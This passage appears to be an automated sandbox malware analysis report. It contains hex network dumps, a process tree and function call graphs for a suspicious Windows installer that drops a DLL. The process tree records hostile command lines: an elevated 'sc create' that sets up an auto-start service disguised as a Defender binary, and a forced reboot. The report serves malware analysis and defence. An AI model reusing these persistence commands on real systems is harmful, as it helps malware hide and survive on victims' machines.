                                                                            2024-01-30 12:32:41 UTC1024INData Raw: a7 0c cf 4e fe 18 06 ed e8 c1 a0 b3 46 6d f2 44 55 fc b3 5c 64 4e b6 34 32 59 01 2e de 17 9d 93 21 72 50 49 01 5a 99 42 6f ca ae 82 c4 c1 a4 0a c7 e8 22 90 39 39 82 e3 f4 8e 5d c4 9c e8 c3 0a 51 75 53 93 d2 82 fe c2 b7 d2 8d 46 d0 b5 03 02 46 e9 44 f3 58 8b 6d b1 85 ad 0e 7e 20 dd 0a 94 91 7b 34 03 4b dc ae 0d ec 4e de 5c 30 ab 41 7b 95 9d d6 9e 81 31 db 18 c9 d3 f6 c8 9f 6f a7 9b 98 16 46 47 c1 76 9c 37 af 10 61 14 2c 96 e8 63 cb 9c 67 c6 19 f8 cf 4b dd 35 a8 c6 d3 8a 90 65 62 c6 0a 96 9b d6 0b 3a 5b f1 64 4b 4e ee 97 ad 96 09 f9 1c 0c ac 3b ea dc 8e 00 ef 83 23 9b a4 6d 8f 51 34 ab b6 cf b0 bd c3 74 a8 3a 0f 8c 75 ee 5a db 79 f5 dd 35 00 13 5b d8 c2 00 38 25 0a f9 33 d0 84 92 78 83 32 8b 82 2c db 04 fb 73 fd a0 90 95 e1 26 3f fd bc 54 8e 28 a8 5c 37 ec
                                                                            Data Ascii: NFmDU\dN42Y.!rPIZBo"99]QuSFFDXm~ {4KN\0A{1oFGv7a,cgK5eb:[dKN;#mQ4t:uZy5[8%3x2,s&?T(\7
                                                                            2024-01-30 12:32:41 UTC16384INData Raw: 15 51 73 03 80 4b 56 a7 fe c6 89 ed c4 c3 95 5c 95 34 5a ed 72 7f 82 f6 07 c0 5b 42 a9 7b 1e e8 c6 61 da b2 15 84 8f 0d 45 e2 81 6e 30 17 47 16 bc 80 e4 74 b0 67 95 20 c8 df 27 79 6c 5b 72 7f 19 7f d1 41 48 1e ce e8 fc 4e cb ee 36 83 70 95 69 6f 9d b8 78 14 52 f4 b5 c4 fd 8f 1f 7d 30 a2 20 43 e8 94 7d c8 8d 6e 77 c7 08 65 7b f6 6b d7 af ac 68 e7 6d c1 a6 9d 4d 7a 3a 33 d8 54 81 bd aa 31 15 86 f4 a9 2e b4 c9 d2 0d b4 3d 82 8f d2 7d 0f a2 1b ad 53 fc c9 5d 4c ed 75 c8 10 45 a3 5b c3 fe d4 f5 43 b1 8b eb a9 af d5 21 7d ae 0b 67 1b c0 49 6a a8 51 92 a9 42 73 2d 20 bc ed 77 34 ff 73 ba cb 96 62 44 7a f2 4e d5 87 f0 17 28 6d 8c 3a 16 df cb 2d 19 09 6c e7 38 6f 07 43 c4 56 48 54 15 c8 82 c8 dc 08 ea a5 8c 76 e0 8f aa 92 1d 07 b2 a9 00 1d d0 f3 de 5b 61 92 ef ac
                                                                            Data Ascii: QsKV\4Zr[B{aEn0Gtg 'yl[rAHN6pioxR}0 C}nwe{khmMz:3T1.=}S]LuE[C!}gIjQBs- w4sbDzN(m:-l8oCVHTv[a
                                                                            2024-01-30 12:32:41 UTC1024INData Raw: 77 7d 7e 6e bb 13 da 68 38 8f 0f 81 21 e7 7d 79 f6 04 21 04 94 46 fd 1e f6 11 81 d9 54 c8 5a ae ba f4 2d a5 15 f3 98 d7 9f 9a d8 7c 5d 1e b8 77 fa 7f 86 cb bf 1c 14 bf 0b 57 9e f0 34 b2 ab 33 63 74 99 ba b1 54 fc d1 28 66 1c 62 c8 eb ae cc 1f f6 46 32 43 2c db 83 06 cb fd 71 99 7b 8a 91 91 71 1c 80 ba e5 fa 27 2d 8e e1 fc 01 f2 d4 ea 9d 61 1d b2 92 f6 5e 40 7b 69 0d 9b e1 a7 6e f1 79 a9 3a 7d ef 37 12 86 1c 7f 75 c7 1d da cd f6 dc 41 8c a0 49 3d 10 f6 32 71 e2 8f 21 95 54 9c 3f 49 a3 2e 9a 46 5f bd 90 0a 32 b4 84 04 63 be dd e9 3d 45 38 78 6a 71 af df b5 99 76 4e b6 60 98 02 3c 28 2a 8c 58 32 ab 3d 58 6d 70 64 50 33 66 9e 38 99 15 2c 57 aa d6 4b de 5f 43 97 b4 87 62 a8 bd f6 58 a9 51 25 e6 35 f1 74 34 df 4e db 0d fa fa 55 8e 9d 95 ff 9d 04 79 39 cb a9 54
                                                                            Data Ascii: w}~nh8!}y!FTZ-|]wW43ctT(fbF2C,q{q'-a^@{iny:}7uAI=2q!T?I.F_2c=E8xjqvN`<(*X2=XmpdP3f8,WK_CbXQ%5t4NUy9T
                                                                            2024-01-30 12:32:41 UTC16384INData Raw: 7f d1 25 ee 6d 1c 29 4a 40 e7 2d a3 21 ba d8 91 15 c3 51 4b 60 cc 3c eb 9c 5a 30 2b 2b 4c 74 45 0b 5a bb 2a 37 62 e8 85 a1 ce 24 74 42 aa b4 ef 82 44 b4 d9 14 14 1b 2c ae 29 97 7e ac 29 60 84 25 cd 40 60 83 4a 3d 0d aa 14 24 10 13 f4 89 cc c0 87 17 f2 f4 ca 7d ef cf 34 0b a0 db 78 45 0a df 84 58 10 a2 e0 9c 34 cc 7e 6d 41 a1 92 d4 50 92 eb 07 2f da 66 36 e9 72 12 6a e1 68 e8 2e dc 8f 58 f5 6a 28 39 c1 6b d8 e4 29 73 8b e2 05 0d 2a 8c 66 0a 2e 8a 90 cd 81 99 ee 88 a0 eb 64 b9 2c 01 25 af 0e 9c e9 b2 c0 2e 09 2c 68 0c e1 16 78 e3 79 ca c2 91 53 60 65 cd fc a9 65 7a 5d 5a 62 9a d3 ae 08 5c e9 2a cf 41 2e 25 44 bd ac e3 16 c0 0d 61 b7 cd 9d 81 10 37 ac e3 bb 91 a0 8c ff 2f fa 34 5a 69 f6 44 ed f4 1d 04 88 f5 aa cb fd a2 90 60 90 bb 63 ea 9a 3e c0 6b 0d ba b1
                                                                            Data Ascii: %m)J@-!QK`<Z0++LtEZ*7b$tBD,)~)`%@`J=$}4xEX4~mAP/f6rjh.Xj(9k)s*f.d,%.,hxyS`eez]Zb\*A.%Da7/4ZiD`c>k
                                                                            2024-01-30 12:32:41 UTC1024INData Raw: 79 9c e1 61 85 f2 24 71 5b b2 31 dc 6a 0c 83 06 32 84 ca 36 09 03 55 eb 5a a7 9d b4 7b f8 81 fc 32 ae 91 ff 01 5c d2 b7 d0 40 70 d9 90 e3 06 21 e1 6b 70 da 63 27 9d ff 43 4a 45 27 ea 0c f3 ba 5a bc 4f 66 28 ef b7 26 11 fd 92 bf 2c ad ae a0 a7 a4 1b 01 48 06 a4 2d 5e 41 c8 28 b3 9c 86 29 ed e5 fa d6 ef 5b 28 7a 93 f5 e5 bd 82 f7 ba cb 16 78 e4 84 58 b5 ad 5f 9f 8e d8 89 7b 65 cb 9f 51 90 0d b6 1d 37 c0 de 97 20 8d c5 d4 57 15 dd 53 bf d1 1a 95 0f f7 2f dd 63 20 ef b0 5b cb e5 e0 86 a9 3a 83 e4 ac 2b e3 82 a1 8f 55 85 d1 2e 58 77 62 52 6b 22 2e e4 38 02 6f ee a3 6a 5b 2d 6f f3 7a a5 cb 11 96 ef d2 35 2c df 0a 6a fc 36 c2 3c e5 f2 6e e2 0a c3 1e 64 6d 9e c3 06 b3 0d 9b c2 1b 30 cb 3a ff a7 5b 87 62 d4 9a 58 d6 db c6 da 04 70 0b 87 9b 1a 1b 2a 45 4c fc d4 cb
                                                                            Data Ascii: ya$q[1j26UZ{2\@p!kpc'CJE'ZOf(&,H-^A()[(zxX_{eQ7 WS/c [:+U.XwbRk".8oj[-oz5,j6<ndm0:[bXp*EL
                                                                            2024-01-30 12:32:41 UTC16384INData Raw: 92 90 bd c5 65 20 9e 3a b1 79 f7 83 48 89 47 27 d6 b1 b9 13 a7 32 80 b6 b9 12 4f 40 29 4b 70 b8 db d0 a3 f3 98 bf 55 5c 64 1c 3f 93 aa ea f1 a1 c9 e6 80 79 e2 f6 2b b7 87 d3 40 32 89 37 6a 43 35 30 e2 1f e3 10 74 d7 be 72 70 5d 3f c0 9f 08 2d 93 04 ca 8b 13 1a 53 95 dc cc 70 da 4c 1c 4f fb 78 4f 65 c4 4d 0c 75 00 06 15 06 78 6f 53 7a 31 cd 97 b0 a0 0e 38 c5 f3 5b 55 81 03 b9 6f a9 d4 9b e5 aa 63 f1 03 d6 dd 7c 34 5e 10 9a e6 55 07 37 c3 a0 83 bd a7 07 e3 a2 05 f9 93 f9 5c 5f 88 cd 3e 11 5e 9d b4 20 e1 14 aa 46 87 c9 6a 64 17 9c ed 7e f4 b2 90 98 a3 1a 17 f2 ed 7a 08 71 4f ae e2 f7 af 1c e2 6e 79 c6 29 bb 61 63 c7 ea 02 24 6d 88 fa 24 56 dc 8f f4 07 26 6f 85 00 ed cd 1b b1 68 9c 52 63 45 48 4f 20 00 86 fe ff 46 00 86 f4 d6 3f 3b 78 d9 98 2b db 0e 87 23 84
                                                                            Data Ascii: e :yHG'2O@)KpU\d?y+@27jC50trp]?-SpLOxOeMuxoSz18[Uoc|4^U7\_>^ Fjd~zqOny)ac$m$V&ohRcEHO F?;x+#


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:13:32:21
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            Imagebase:0x2b0000
                                                                            File size:30'540'800 bytes
                                                                            MD5 hash:511FDCC7FC2F4220353004CFB011F522
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:13:32:21
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC
                                                                            Imagebase:0x2b0000
                                                                            File size:30'540'800 bytes
                                                                            MD5 hash:511FDCC7FC2F4220353004CFB011F522
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:13:32:22
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:1'899'520 bytes
                                                                            MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:13:32:26
                                                                            Start date:30/01/2024
                                                                            Path:C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrun
                                                                            Imagebase:0x2af0b450000
                                                                            File size:359'424 bytes
                                                                            MD5 hash:A8AEC0D17F15C613DCCAD945FCF6F928
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:13:32:26
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                            Imagebase:0x7ff6eef20000
                                                                            File size:55'320 bytes
                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:13:32:32
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
                                                                            Imagebase:0x7ff704ce0000
                                                                            File size:71'680 bytes
                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:13:32:32
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
                                                                            Imagebase:0x580000
                                                                            File size:61'440 bytes
                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:10
                                                                            Start time:13:32:37
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
                                                                            Imagebase:0x7ff704ce0000
                                                                            File size:71'680 bytes
                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:11
                                                                            Start time:13:32:38
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
                                                                            Imagebase:0x580000
                                                                            File size:61'440 bytes
                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:14
                                                                            Start time:13:32:46
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:15
                                                                            Start time:13:32:46
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:16
                                                                            Start time:13:32:46
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                            Imagebase:0x1d0000
                                                                            File size:61'440 bytes
                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:19
                                                                            Start time:13:32:55
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\SysWOW64\shutdown.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                                            Imagebase:0x790000
                                                                            File size:23'552 bytes
                                                                            MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:20
                                                                            Start time:13:32:55
                                                                            Start date:30/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:10.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:6.7%
                                                                              Total number of Nodes:75
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 249 2b9cdb 250 2b9c8e 249->250 250->249 252 2ba090 250->252 278 2b9df1 252->278 254 2ba0a0 255 2ba0fd 254->255 263 2ba121 254->263 287 2ba02e 255->287 258 2ba199 LoadLibraryExA 259 2ba1fa 258->259 260 2ba1ac GetLastError 258->260 262 2ba205 FreeLibrary 259->262 267 2ba20c 259->267 264 2ba1bf 260->264 265 2ba1d5 260->265 261 2ba2c8 272 2ba02e DloadReleaseSectionWriteAccess 6 API calls 261->272 262->267 263->258 263->259 263->261 263->267 264->259 264->265 268 2ba02e DloadReleaseSectionWriteAccess 6 API calls 265->268 266 2ba26a GetProcAddress 266->261 269 2ba27a GetLastError 266->269 267->261 267->266 270 2ba1e0 RaiseException 268->270 271 2ba28d 269->271 273 2ba2f6 270->273 271->261 274 2ba02e DloadReleaseSectionWriteAccess 6 API calls 271->274 272->273 273->250 275 2ba2ae RaiseException 274->275 276 2b9df1 DloadAcquireSectionWriteAccess 6 API calls 275->276 277 2ba2c5 276->277 277->261 279 2b9dfd 278->279 280 2b9e23 278->280 295 2b9e97 279->295 280->254 283 2b9e1e 303 2b9e24 283->303 288 2ba062 RaiseException 287->288 289 2ba040 287->289 288->273 290 2b9e97 DloadReleaseSectionWriteAccess 3 API calls 289->290 291 2ba045 290->291 292 2ba05d 291->292 293 2b9fc0 DloadProtectSection 3 API calls 291->293 313 2ba064 292->313 293->292 296 2b9e24 DloadGetSRWLockFunctionPointers 3 API calls 295->296 297 2b9e02 296->297 297->283 298 2b9fc0 297->298 299 2b9fd5 DloadObtainSection 298->299 300 2b9fdb 299->300 301 2ba010 VirtualProtect 299->301 309 2b9ed6 VirtualQuery 299->309 300->283 301->300 304 2b9e32 303->304 307 2b9e47 303->307 305 2b9e36 GetModuleHandleW 304->305 304->307 306 2b9e4b GetProcAddress 305->306 305->307 306->307 308 2b9e5b GetProcAddress 306->308 307->254 308->307 310 2b9ef1 309->310 311 2b9efc GetSystemInfo 310->311 312 2b9f33 310->312 311->312 312->301 314 2b9e24 DloadGetSRWLockFunctionPointers 3 API calls 313->314 315 2ba069 314->315 315->288 316 2b9c48 317 2b9c37 316->317 317->316 318 2ba090 ___delayLoadHelper2@8 14 API calls 317->318 318->317 319 2b9c2d 321 2b9c37 319->321 320 2ba090 ___delayLoadHelper2@8 14 API calls 320->321 321->320 325 2bab5c 328 2bb0b8 325->328 327 2bab61 327->327 329 2bb0ce 328->329 331 2bb0d7 329->331 332 2bb06b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 329->332 331->327 332->331 333 2b9cb3 334 2b9c8e 333->334 335 2ba090 ___delayLoadHelper2@8 14 API calls 334->335 335->334 339 2b9d21 340 2b9d2b 339->340 341 2ba090 ___delayLoadHelper2@8 14 API calls 340->341 342 2b9d38 341->342

                                                                              Callgraph

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 15 2b9cdb-2b9ce0 call 2ba090 18 2b9c9b-2b9c9c 15->18 18->15
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: d719fa9c5987a24306b5b252d3757c6ee41096cca9b294c5e0680324264ef6cc
                                                                              • Instruction ID: a7fd822035c684f8b221e79e1defeca5ab8f0cab2bfa28b5657e7e1b4f485808
                                                                              • Opcode Fuzzy Hash: d719fa9c5987a24306b5b252d3757c6ee41096cca9b294c5e0680324264ef6cc
                                                                              • Instruction Fuzzy Hash: 82B0128137C1007D3114B3181C02E76064CE0D4B603304C2BF100C5280D8801CB00033
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5 2b9cbd-2b9cc2 6 2b9c8e-2b9c96 call 2ba090 5->6 8 2b9c9b-2b9ce0 6->8 8->6
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: dc9a7d3f221735f24422a515ff1f0fbd6d5ba2e7fea112c21d8bac71bce6e305
                                                                              • Instruction ID: fa0af724d3d8e0536b0895b28ba930839749ae202f5e9d69c9444825df8e7cb2
                                                                              • Opcode Fuzzy Hash: dc9a7d3f221735f24422a515ff1f0fbd6d5ba2e7fea112c21d8bac71bce6e305
                                                                              • Instruction Fuzzy Hash: 48B0128227C1007D3104B3181C02F76168CE0C4F603308C2BF100C5240D8801C700033
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 2b9cb3-2b9cb8 1 2b9c8e-2b9c96 call 2ba090 0->1 3 2b9c9b-2b9ce0 1->3 3->1
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: bd070a22f5c723d186d6f642e9eb1043db89febe2c25b70c1dad145d42450918
                                                                              • Instruction ID: bf3d1ccab3266b1c28dca78a67bf25d4e74bce46184f01c53a903ee5af7eb9d4
                                                                              • Opcode Fuzzy Hash: bd070a22f5c723d186d6f642e9eb1043db89febe2c25b70c1dad145d42450918
                                                                              • Instruction Fuzzy Hash: 8FB0128127C1007D3104B3281C02E76168CD1C4F60330CC2BF500C5240D9801C700033
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 10 2b9cd1-2b9cd6 11 2b9c8e-2b9c96 call 2ba090 10->11 13 2b9c9b-2b9ce0 11->13 13->11
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002B9C96
                                                                                • Part of subcall function 002BA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 002BA09B
                                                                                • Part of subcall function 002BA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002BA103
                                                                                • Part of subcall function 002BA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002BA114
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641302260.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1641283427.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641328071.00000000002CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641345526.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000002DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.0000000000CDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1641386482.00000000016DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2b0000_WKYC506_2389030007-00901003007010_777380775_#U00b2.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 1cf5762cc67cabbd56af4eff0bf6d45f0a564c214f5715767279d5b46071e8ce
